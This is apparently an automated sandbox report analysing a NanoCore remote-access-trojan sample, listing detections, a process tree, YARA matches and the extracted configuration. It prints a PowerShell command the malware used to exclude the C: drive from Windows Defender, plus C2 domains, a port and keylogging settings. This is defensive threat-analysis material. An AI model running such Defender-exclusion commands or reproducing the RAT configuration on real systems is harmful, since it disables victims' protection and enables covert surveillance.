Play interactive tour

Edit tour

Analysis Report ZVFVY7NwZ7.exe

Overview

General Information

Sample Name:	ZVFVY7NwZ7.exe
Analysis ID:	431812
MD5:	8e87de15cd3da1245b9c7b0e48c0f126
SHA1:	80830909ec859ed61811329ae16888cb87e1ed5f
SHA256:	ec850202f17a8e7f5a04603e9c70ab21d7b39fb3142a79098aef1d592974702e
Tags:	exeNanoCoreRAT
Infos:
Most interesting Screenshot:

Detection

Nanocore

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Detected Nanocore Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Sigma detected: NanoCore

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected Nanocore RAT

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Creates an undocumented autostart registry key

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Non Interactive PowerShell

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

ZVFVY7NwZ7.exe (PID: 2220 cmdline: 'C:\Users\user\Desktop\ZVFVY7NwZ7.exe' MD5: 8E87DE15CD3DA1245B9C7B0E48C0F126)

wscript.exe (PID: 1784 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Lzqtfofnnzmk.vbs' MD5: 7075DD7B9BE8807FCA93ACD86F724884)

powershell.exe (PID: 3016 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\chromee\chromee.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 4180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

ZVFVY7NwZ7.exe (PID: 5612 cmdline: C:\Users\user\AppData\Local\Temp\ZVFVY7NwZ7.exe MD5: 8E87DE15CD3DA1245B9C7B0E48C0F126)

cleanup

Malware Configuration

Threatname: NanoCore

{"Version": "1.2.2.0", "Mutex": "4614bd42-26c0-4da0-8e09-16890d37", "Group": "Default", "Domain1": "wekeepworking.sytes.net", "Domain2": "wekeepworking12.sytes.net", "Port": 1144, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1049d:$x1: NanoCore.ClientPluginHost 0x104da:$x2: IClientNetworkHost 0x1400d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.335459284.0000000003E69000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x10205:$a: NanoCore 0x10215:$a: NanoCore 0x10449:$a: NanoCore 0x1045d:$a: NanoCore 0x1049d:$a: NanoCore 0x10264:$b: ClientPlugin 0x10466:$b: ClientPlugin 0x104a6:$b: ClientPlugin 0x1038b:$c: ProjectData 0x10d92:$d: DESCrypto 0x1875e:$e: KeepAlive 0x1674c:$g: LogClientMessage 0x12947:$i: get_Connected 0x110c8:$j: #=q 0x110f8:$j: #=q 0x11114:$j: #=q 0x11144:$j: #=q 0x11160:$j: #=q 0x1117c:$j: #=q 0x111ac:$j: #=q 0x111c8:$j: #=q
0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
0000000D.00000002.484283906.0000000006400000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000000.331387954.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000D.00000002.484696296.0000000006740000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
0000000D.00000002.484696296.0000000006740000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
0000000D.00000002.484800150.0000000006790000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
0000000D.00000002.484800150.0000000006790000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5fee:$x2: NanoCore.ClientPluginHost 0x9441:$s4: PipeCreated 0x6018:$s5: IClientLoggingHost
0000000D.00000002.484337930.0000000006420000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
0000000D.00000002.484337930.0000000006420000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000000.331849695.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.475975321.0000000002E91000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x2c87f:$a: NanoCore 0x2c8d8:$a: NanoCore 0x2c915:$a: NanoCore 0x2c98e:$a: NanoCore 0x35472:$a: NanoCore 0x35497:$a: NanoCore 0x354f0:$a: NanoCore 0x456a3:$a: NanoCore 0x456c9:$a: NanoCore 0x45725:$a: NanoCore 0x5258b:$a: NanoCore 0x525e4:$a: NanoCore 0x52617:$a: NanoCore 0x52843:$a: NanoCore 0x528bf:$a: NanoCore 0x52ed8:$a: NanoCore 0x53021:$a: NanoCore 0x534f5:$a: NanoCore 0x537dc:$a: NanoCore 0x537f3:$a: NanoCore 0x58da1:$a: NanoCore
0000000D.00000002.484498956.0000000006480000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
0000000D.00000002.484498956.0000000006480000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
0000000D.00000002.484317113.0000000006410000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
0000000D.00000002.484317113.0000000006410000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
00000000.00000002.333737756.0000000002E9F000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4d81d:$x1: NanoCore.ClientPluginHost 0x4d85a:$x2: IClientNetworkHost 0x5138d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.333737756.0000000002E9F000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4d585:$a: NanoCore 0x4d595:$a: NanoCore 0x4d7c9:$a: NanoCore 0x4d7dd:$a: NanoCore 0x4d81d:$a: NanoCore 0x4d5e4:$b: ClientPlugin 0x4d7e6:$b: ClientPlugin 0x4d826:$b: ClientPlugin 0x4d70b:$c: ProjectData 0x4e112:$d: DESCrypto 0x4fcc7:$i: get_Connected 0x4e448:$j: #=q 0x4e478:$j: #=q 0x4e494:$j: #=q 0x4e4c4:$j: #=q 0x4e4e0:$j: #=q 0x4e4fc:$j: #=q 0x4e52c:$j: #=q 0x4e548:$j: #=q 0x4e58c:$j: #=q 0x4e5a8:$j: #=q
0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xff8d:$x1: NanoCore.ClientPluginHost 0xffca:$x2: IClientNetworkHost 0x13afd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.469794004.0000000000402000.00000040.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfcf5:$a: NanoCore 0xfd05:$a: NanoCore 0xff39:$a: NanoCore 0xff4d:$a: NanoCore 0xff8d:$a: NanoCore 0xfd54:$b: ClientPlugin 0xff56:$b: ClientPlugin 0xff96:$b: ClientPlugin 0xfe7b:$c: ProjectData 0x10882:$d: DESCrypto 0x1824e:$e: KeepAlive 0x1623c:$g: LogClientMessage 0x12437:$i: get_Connected 0x10bb8:$j: #=q 0x10be8:$j: #=q 0x10c04:$j: #=q 0x10c34:$j: #=q 0x10c50:$j: #=q 0x10c6c:$j: #=q 0x10c9c:$j: #=q 0x10cb8:$j: #=q
00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x134b3d:$x1: NanoCore.ClientPluginHost 0x134b7a:$x2: IClientNetworkHost 0x1386ad:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.335651817.0000000003EFF000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1348a5:$a: NanoCore 0x1348b5:$a: NanoCore 0x134ae9:$a: NanoCore 0x134afd:$a: NanoCore 0x134b3d:$a: NanoCore 0x134904:$b: ClientPlugin 0x134b06:$b: ClientPlugin 0x134b46:$b: ClientPlugin 0x134a2b:$c: ProjectData 0x135432:$d: DESCrypto 0x13cdfe:$e: KeepAlive 0x13adec:$g: LogClientMessage 0x136fe7:$i: get_Connected 0x135768:$j: #=q 0x135798:$j: #=q 0x1357b4:$j: #=q 0x1357e4:$j: #=q 0x135800:$j: #=q 0x13581c:$j: #=q 0x13584c:$j: #=q 0x135868:$j: #=q
0000000D.00000002.484473522.0000000006470000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
0000000D.00000002.484473522.0000000006470000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
0000000D.00000002.481077983.0000000004080000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.482916804.0000000005420000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
0000000D.00000002.482916804.0000000005420000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10b5d:$x1: NanoCore.ClientPluginHost 0x10b9a:$x2: IClientNetworkHost 0x146cd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
00000000.00000002.337200878.00000000040C3000.00000004.00000001.sdmp	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x108c5:$a: NanoCore 0x108d5:$a: NanoCore 0x10b09:$a: NanoCore 0x10b1d:$a: NanoCore 0x10b5d:$a: NanoCore 0x10924:$b: ClientPlugin 0x10b26:$b: ClientPlugin 0x10b66:$b: ClientPlugin 0x10a4b:$c: ProjectData 0x11452:$d: DESCrypto 0x18e1e:$e: KeepAlive 0x16e0c:$g: LogClientMessage 0x13007:$i: get_Connected 0x11788:$j: #=q 0x117b8:$j: #=q 0x117d4:$j: #=q 0x11804:$j: #=q 0x11820:$j: #=q 0x1183c:$j: #=q 0x1186c:$j: #=q 0x11888:$j: #=q
0000000D.00000002.484017800.0000000006040000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost
0000000D.00000002.484017800.0000000006040000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0xe576:$s4: PipeCreated 0x8bbf:$s5: IClientLoggingHost
0000000D.00000002.484414885.0000000006450000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
0000000D.00000002.484414885.0000000006450000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
0000000D.00000002.484531579.0000000006490000.00000004.00000001.sdmp	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0000000D.00000002.483489458.0000000005670000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
0000000D.00000002.483489458.0000000005670000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
0000000D.00000002.484260372.00000000063F0000.00000004.00000001.sdmp	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
0000000D.00000002.484260372.00000000063F0000.00000004.00000001.sdmp	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
Process Memory Space: ZVFVY7NwZ7.exe PID: 5612	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xc485f:$x1: NanoCore.ClientPluginHost 0xf732e:$x1: NanoCore.ClientPluginHost 0x12b712:$x1: NanoCore.ClientPluginHost 0x154e43:$x1: NanoCore.ClientPluginHost 0x157c37:$x1: NanoCore.ClientPluginHost 0x162555:$x1: NanoCore.ClientPluginHost 0x1750d3:$x1: NanoCore.ClientPluginHost 0x177abd:$x1: NanoCore.ClientPluginHost 0x17af3a:$x1: NanoCore.ClientPluginHost 0x17db25:$x1: NanoCore.ClientPluginHost 0x184cdc:$x1: NanoCore.ClientPluginHost 0x189b37:$x1: NanoCore.ClientPluginHost 0x19632a:$x1: NanoCore.ClientPluginHost 0x19d48b:$x1: NanoCore.ClientPluginHost 0x1e3297:$x1: NanoCore.ClientPluginHost 0x1f2ef2:$x1: NanoCore.ClientPluginHost 0x28e050:$x1: NanoCore.ClientPluginHost 0x2944a6:$x1: NanoCore.ClientPluginHost 0x2cdcde:$x1: NanoCore.ClientPluginHost 0x2e5024:$x1: NanoCore.ClientPluginHost 0x30799a:$x1: NanoCore.ClientPluginHost
Process Memory Space: ZVFVY7NwZ7.exe PID: 5612	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
Process Memory Space: ZVFVY7NwZ7.exe PID: 5612	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xc485f:$a: NanoCore 0xc492d:$a: NanoCore 0xc5f90:$a: NanoCore 0xc6003:$a: NanoCore 0xf6e33:$a: NanoCore 0xf6e4f:$a: NanoCore 0xf6faa:$a: NanoCore 0xf6fb9:$a: NanoCore 0xf7292:$a: NanoCore 0xf72be:$a: NanoCore 0xf732e:$a: NanoCore 0x106d70:$a: NanoCore 0x106d82:$a: NanoCore 0x106dbe:$a: NanoCore 0x12b6a1:$a: NanoCore 0x12b6d1:$a: NanoCore 0x12b712:$a: NanoCore 0x13342d:$a: NanoCore 0x133443:$a: NanoCore 0x13346a:$a: NanoCore 0x147946:$a: NanoCore
Process Memory Space: ZVFVY7NwZ7.exe PID: 2220	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2a44a:$x1: NanoCore.ClientPluginHost 0x2a4ab:$x2: IClientNetworkHost 0x2f8b0:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x3376f:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
Process Memory Space: ZVFVY7NwZ7.exe PID: 2220	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x29f4f:$a: NanoCore 0x29f6b:$a: NanoCore 0x2a0c6:$a: NanoCore 0x2a0d5:$a: NanoCore 0x2a3ae:$a: NanoCore 0x2a3da:$a: NanoCore 0x2a44a:$a: NanoCore 0x2fdd9:$a: NanoCore 0x2fdeb:$a: NanoCore 0x2fe27:$a: NanoCore 0x29ff6:$b: ClientPlugin 0x2a11f:$b: ClientPlugin 0x2a3e3:$b: ClientPlugin 0x2a453:$b: ClientPlugin 0x2fdf4:$b: ClientPlugin 0x2fe30:$b: ClientPlugin 0x2a26c:$c: ProjectData 0x2fd26:$c: ProjectData 0x2b3a8:$d: DESCrypto 0x30684:$d: DESCrypto 0x2da46:$i: get_Connected
Click to see the 50 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.ZVFVY7NwZ7.exe.6400000.14.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x605:$x1: NanoCore.ClientPluginHost 0x63e:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6400000.14.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x605:$x2: NanoCore.ClientPluginHost 0x720:$s4: PipeCreated 0x61f:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.674e8a4.25.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10937:$x1: NanoCore.ClientPluginHost 0x10951:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.674e8a4.25.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x10937:$x2: NanoCore.ClientPluginHost 0x13c74:$s4: PipeCreated 0x10924:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6480000.19.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x170b:$x1: NanoCore.ClientPluginHost 0x1725:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.6480000.19.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x170b:$x2: NanoCore.ClientPluginHost 0x34b6:$s4: PipeCreated 0x16f8:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.6410000.15.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
13.2.ZVFVY7NwZ7.exe.6410000.15.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
13.2.ZVFVY7NwZ7.exe.409e360.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
13.2.ZVFVY7NwZ7.exe.409e360.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.ZVFVY7NwZ7.exe.40c39d0.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.2.ZVFVY7NwZ7.exe.2edc690.3.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.ZVFVY7NwZ7.exe.2edc690.3.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0xe3b7:$s5: IClientLoggingHost
0.2.ZVFVY7NwZ7.exe.2edc690.3.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q 0xf0fc:$j: #=q 0xf118:$j: #=q
